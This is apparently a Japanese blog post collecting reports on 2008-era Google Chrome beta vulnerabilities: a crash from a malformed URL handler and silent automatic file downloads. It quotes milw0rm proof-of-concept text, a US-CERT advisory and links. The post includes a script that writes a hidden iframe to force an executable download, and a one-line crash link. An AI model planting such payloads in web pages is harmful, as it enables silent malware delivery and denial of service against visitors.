Google Chrome Browser 0.2.149.27 malicious link DoS Vulnerability(情報元のブックマーク数)
Google ChromeのDoSを受ける問題のPoCが出ているそうです。
Problem:
http://www.milw0rm.com/exploits/6353
An issue exists in how chrome behaves with undefined-handlers in chrome.dll version
0.2.149.27. A crash can result without user interaction. When a user is made to visit
a malicious link, which has an undefined handler followed by a 'special' character,
the chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed.
Restart now?". It lies in dealing with the POP EBP instruction when pointed out by the
EIP register at 0x01002FF4.
ChromeではJavascriptでのiframeを開いちゃうそうです
***************************************************************************
Author: nerex
E-mail: nerex[at]live[dot]comGoogle's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt.This proof-of-concept was created for educational purposes only.
Use the code it at your own risk.
The author will not be responsible for any damages.Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
http://www.milw0rm.com/exploits/6355
**************************************************************************
<script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script>
http://www.milw0rm.com/exploits/6355
US-CERTからもアドバイザリが出ていますね。
US-CERT is aware of a vulnerability that affects the Google Chrome web browser. This vulnerability is due to a default configuration that allows files to be downloaded without prompting the user. In addition, downloaded files can be opened with a single click, which could allow a user to inadvertently open a malicious file.
http://www.us-cert.gov/current/index.html#google_chrome_vulnerability
US-CERT encourages users to enable the "Ask where to save each file before downloading" option within the "Minor Tweaks" tab in the browser preferences. Although this does not fix the underlying vulnerability, selecting this option will warn the user before files are downloaded. Users should still exercise caution when visiting and downloading items from untrusted websites.
US-CERT will provide additional information as it becomes available.
たったこれだけのコードで落ちるそうですwwwww
Want to crash Chrome? Kolor, a regular contributor to the blog, had some fun and put the following in the comments:
GFI LABS Blog: Some more Chrome fun
<a href=crash:%>
Poof.
You can see it yourself, if you’re running Chrome, here.
関連URL
- Google Chrome vulnerable to carpet-bombing flaw | Zero Day | ZDNet.com
- SecuriTeam™ - Google Chrome Browser URL Handler Crash
- Google Chrome Remote Denial of Service Vulnerability
- Sunbelt Blog: Chrome rocks. I don't care what others say
- SecurityFocus
- http://www.milw0rm.com/exploits/6355
- http://www.us-cert.gov/current/index.html#google_chrome_vulnerability
- Hackers Center Security Blogs - Google Chrome vulnerabilities list
- 「Google Chrome」に初のセキュリティ上の脆弱性 - セキュリティ - ZDNet Japan
- グーグル、Google Chromeのアドレスバー「Omnibox」に入力されたユーザー情報を収集:ニュース - CNET Japan
- MSFN - Google on Chrome EULA controversy: our bad, we'll change it
- Hackers Center Security Blogs - Google Chrome Silent File Download Exploit
- Google Chrome Browser 0.2.149.27 (SaveAs) Remote BOF Exploit
